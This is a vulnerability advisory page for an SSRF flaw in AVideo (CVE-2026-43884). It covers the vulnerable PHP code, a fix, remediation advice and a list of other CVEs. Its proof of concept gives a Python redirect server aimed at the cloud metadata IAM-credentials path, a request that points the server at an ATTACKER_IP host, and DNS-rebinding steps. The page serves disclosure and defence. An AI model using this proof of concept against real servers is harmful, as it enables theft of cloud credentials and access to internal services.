Skip to main content

AVideo CVE-2026-43884

HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-05 https://github.com/WWBN/AVideo GHSA-2hch-c97c-g99x
7.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.7 HIGH
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 23:01 vuln.today
Analysis Generated
May 05, 2026 - 23:01 vuln.today

DescriptionGitHub Advisory

Summary

Two endpoints in AVideo call isSSRFSafeURL() to validate user-supplied URLs, then fetch them using bare file_get_contents() without disabling PHP's automatic redirect following. An attacker can supply a URL pointing to a server they control that returns a 302 redirect to an internal/cloud-metadata address (e.g., http://169.254.169.254/latest/meta-data/). Since isSSRFSafeURL() only validates the *initial* URL, the redirect target bypasses all SSRF protections.

A secondary finding is that 6+ callers of isSSRFSafeURL() discard the $resolvedIP out-parameter meant for DNS pinning, leaving them vulnerable to DNS rebinding TOCTOU attacks.

Severity: High - CVSS 3.1: 7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Details

Finding 1: Redirect-Based SSRF Bypass

Vulnerable code - plugin/AI/receiveAsync.json.php (line ~162-165):

php
// SSRF Protection: Validate URL before fetching
if (!isSSRFSafeURL($imageUrl)) {
    // blocked
} else {
    $imageContent = file_get_contents($imageUrl);  // ← FOLLOWS REDIRECTS!
}

Vulnerable code - objects/EpgParser.php (line ~358-362):

php
if (!isSSRFSafeURL($this->url)) {
    throw new \RuntimeException('URL blocked by SSRF protection');
}
$this->content = @file_get_contents($this->url);  // ← FOLLOWS REDIRECTS!

Safe code for comparison - objects/functions.php, url_get_contents():

php
$opts = ['http' => ['follow_location' => 0]];  // Disable auto-redirect
$context = stream_context_create($opts);
for ($redirectCount = 0; $redirectCount <= 5; $redirectCount++) {
    $fetched = file_get_contents($currentUrl, false, $context);
    // ... parse Location header ...
    if ($redirectTarget) {
        if (!isSSRFSafeURL($redirectTarget)) {  // Re-validates EACH hop
            return false;
        }
        $currentUrl = $redirectTarget;
        continue;
    }
    $tmp = $fetched;
    break;
}

Root cause: The SSRF redirect protection (follow_location=0 + manual redirect loop with per-hop isSSRFSafeURL() re-validation) was correctly implemented in url_get_contents() but NOT propagated to these two endpoints that call file_get_contents() directly. PHP's default follow_location is 1 (follow redirects).

Finding 2: DNS Rebinding TOCTOU (Multiple Callers)

isSSRFSafeURL() provides a $resolvedIP out-parameter for DNS pinning via CURLOPT_RESOLVE. Only 1 of 9 callers (plugin/LiveLinks/proxy.php) uses it. The remaining 8 callers discard it and pass the original hostname to the fetching function, which resolves DNS independently - creating a TOCTOU race window exploitable via DNS rebinding (TTL=0).

Affected callers (no DNS pinning):

  • objects/aVideoEncoderReceiveImage.json.php - 4 call sites
  • objects/aVideoEncoder.json.php - 1 call site
  • plugin/BulkEmbed/save.json.php - 1 call site
  • plugin/AI/receiveAsync.json.php - 1 call site
  • objects/EpgParser.php - 1 call site
  • plugin/Scheduler/Scheduler.php - 1 call site

PoC

Redirect Bypass PoC
  1. Attacker runs an HTTP server that returns a 302 redirect:
python
from http.server import HTTPServer, BaseHTTPRequestHandler

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", "http://169.254.169.254/latest/meta-data/iam/security-credentials/")
        self.end_headers()

HTTPServer(("0.0.0.0", 8888), RedirectHandler).serve_forever()
  1. Attacker triggers AI image generation and intercepts the callback:
POST /plugin/AI/receiveAsync.json.php
Content-Type: application/x-www-form-urlencoded

type=image&token=VALID_TOKEN&ai_responses_id=ID&response[data][0][url]=http://ATTACKER_IP:8888/redir
  1. isSSRFSafeURL("http://ATTACKER_IP:8888/redir") resolves attacker IP → public → passes
  2. file_get_contents("http://ATTACKER_IP:8888/redir") follows 302 to http://169.254.169.254/... - no SSRF re-check occurs
  3. Cloud metadata (including IAM credentials) is saved as a video thumbnail, retrievable by the attacker

Control test: Replace the redirect target with a legitimate public URL - isSSRFSafeURL() passes and the content is fetched normally, confirming the function works for non-malicious URLs.

DNS Rebinding PoC
  1. Configure a domain with TTL=0 DNS that alternates:
  • First query: public IP (passes isSSRFSafeURL)
  • Second query: 127.0.0.1 (reaches internal services)
  1. Submit http://rebind.attacker.com/image.jpg to any affected endpoint
  2. isSSRFSafeURL() resolves → public IP → passes (discards $resolvedIP)
  3. url_get_contents() / file_get_contents() resolves again → 127.0.0.1 → SSRF achieved

Impact

An authenticated attacker can force the AVideo server to make HTTP requests to arbitrary internal hosts, including:

  • Cloud metadata endpoints (169.254.169.254) - exfiltrate IAM credentials, instance identity
  • Internal services on localhost or private network (databases, admin panels, monitoring)
  • Port scanning of the internal network using the server as a proxy

The exfiltrated data is stored as video thumbnails/images, making it retrievable through the application's public interface.

Suggested Fix

Fix 1 (Redirect bypass - immediate): Route both affected files through url_get_contents() which already handles redirects safely, or add explicit no-redirect context:

php
$ctx = stream_context_create(['http' => ['follow_location' => 0]]);
$imageContent = file_get_contents($imageUrl, false, $ctx);

Fix 2 (DNS rebinding - defense-in-depth): Update all callers to capture $resolvedIP and pass it to a DNS-pinning-aware fetch function using CURLOPT_RESOLVE.

Credit

Kai Aizen <kai.aizen.dev@gmail.com>

AnalysisAI

Server-Side Request Forgery (SSRF) in AVideo versions up to 29.0 allows authenticated attackers to exfiltrate cloud metadata credentials and access internal services via HTTP redirect bypass and DNS rebinding attacks. Two endpoints in AVideo's AI plugin and EPG parser validate user-supplied URLs using isSSRFSafeURL() but then fetch them with file_get_contents() using PHP's default automatic redirect following. An attacker supplies a URL to a controlled server returning a 302 redirect to internal resources (e.g., AWS instance metadata at 169.254.169.254), bypassing SSRF protections since only the initial URL is validated. Vendor-released patch available via GitHub commit 603e7bf7. CVSS 7.7 reflects Changed Scope due to cross-boundary access to cloud infrastructure credentials.

Technical ContextAI

This vulnerability exploits a Time-of-Check-Time-of-Use (TOCTOU) flaw in PHP's file_get_contents() function when handling HTTP redirects. PHP's default stream context enables automatic redirect following (follow_location=1), meaning the function transparently follows HTTP 30x responses without exposing redirect targets to application code. AVideo's isSSRFSafeURL() function validates DNS resolution and blocks private IP ranges, cloud metadata endpoints, and localhost addresses, but only checks the initially supplied URL. When file_get_contents() follows a redirect, the Location header URL bypasses all validation. The codebase includes a correctly implemented safe wrapper (url_get_contents() in objects/functions.php) that disables automatic redirects, manually parses Location headers, and re-validates each redirect hop through isSSRFSafeURL(), but two critical endpoints (plugin/AI/receiveAsync.json.php and objects/EpgParser.php) call file_get_contents() directly. A secondary DNS rebinding issue (CWE-350) exists where eight of nine isSSRFSafeURL() callers discard the $resolvedIP parameter meant for DNS pinning via CURLOPT_RESOLVE, creating TOCTOU windows where DNS can be re-resolved between validation and fetching. The CPE identifier pkg:composer/wwbn_avideo confirms this affects the PHP/Composer package.

RemediationAI

Apply the vendor patch immediately via GitHub commit 603e7bf77a835584387327e35560262feb075db3 (https://github.com/WWBN/AVideo/commit/603e7bf77a835584387327e35560262feb075db3), which replaces vulnerable file_get_contents() calls with the existing url_get_contents() wrapper that disables automatic redirects and validates each redirect hop. No fixed version number is specified in the advisory; administrators should pull from the main branch post-patch commit or monitor for release announcements at https://github.com/WWBN/AVideo. If immediate patching is not feasible, implement the following compensating controls with trade-offs: (1) Block outbound HTTP/HTTPS from the AVideo server to 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 127.0.0.0/8 via host firewall or cloud security groups - this prevents metadata access but may break legitimate internal API integrations; verify no internal services are needed before deploying. (2) Disable AI plugin endpoints and EPG parsing features if not business-critical - this eliminates attack surface but removes functionality. (3) Restrict authenticated user privileges and audit accounts with access to AI image generation features - reduces attacker pool but does not eliminate risk from compromised or insider accounts. Network-level controls are preferred over disabling features. Defense-in-depth: deploy instance metadata service v2 (IMDSv2) on AWS EC2 which requires session tokens via PUT requests, blocking simple GET-based SSRF; similar hardening available on GCP and Azure.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-43884 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy